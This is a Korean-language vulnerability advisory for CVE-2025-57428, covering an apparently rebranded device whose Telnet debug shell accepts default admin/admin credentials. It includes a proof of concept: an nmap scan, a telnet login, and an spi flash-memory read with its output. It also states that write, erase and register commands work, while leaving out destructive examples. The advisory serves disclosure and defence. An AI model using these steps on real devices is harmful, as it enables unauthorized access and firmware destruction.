
CVE-2025-57428
⚠️ 이 저장소는 CVE-2025-57428에 대한 참고 자료로만 유지됩니다.
다른 권고 및 업데이트는 security-advisories를 참조하십시오.
이 장치는 Telnet 디버그 인터페이스를 (기본적으로 포트 23에서 활성화됨) 노출하며, 기본적으로 관리자 자격 증명(`admin`/`admin`)을 허용합니다. 인증 후 셸은 저수준 명령(특히 `spi` 및 `reg`)에 직접 접근할 수 있게 하여, 임의의 펌웨어 손상, 장치 벽돌화, 기능 또는 보안 구성 손실로 이어질 수 있습니다.
참고: 저는 파괴적 쓰기를 수행하는 명령을 의도적으로 생략합니다. 아래 PoC는 인터페이스의 존재와 접근 가능성을 확인하며, 즉시 사용 가능한 무기화된 익스플로잇을 제공하지 않습니다.
LAN에서 장치를 스캔합니다:
nmap -p 23 <device-ip>
결과: 포트 23(telnet)이 open으로 표시됩니다.
Telnet으로 연결하고 인증합니다(기본 자격 증명):
telnet <device-ip>
# Login as: admin
# Password: admin
로그인 후 디버그 프롬프트 CMD>가 표시됩니다.
사용 가능한 명령 나열:
CMD>help
도움말 출력에 다음 메뉴가 표시됩니다:
cfg net os
os 메뉴에 들어갑니다:
CMD>os
다시 사용 가능한 명령을 나열합니다:
OS>help
이번에는 도움말 출력에 다음 명령이 표시됩니다:
thread mem spi reg cpuload cpubusy event
spi를 사용하면 spi <rd/wr/er> <addr> [len]이 표시됩니다.
플래시 메모리 읽기:
OS>spi rd 0x000fd0f0 16
이 명령은 플래시 영역의 16진수 덤프를 반환합니다:
4f30650a 938f56fa 1b663a19 e316d824
이로써 명령이 작동하며 셸이 저수준 접근 권한을 가지고 있음을 확인합니다.
쓰기 명령(spi wr)과 지우기 명령(spi er), 그리고 reg 명령도 실행 가능합니다.
관찰 사항:
원래 공급업체의 보안 연락처 또는 지원 채널을 찾으려는 시도는 실패했습니다. 해당 제품은 출처를 알 수 없는 리브랜딩된 장치로 보입니다.
이 정보는 교육 및 방어 목적으로만 제공됩니다. 작성자는 이 정보의 오용에 대해 어떠한 책임도 지지 않습니다.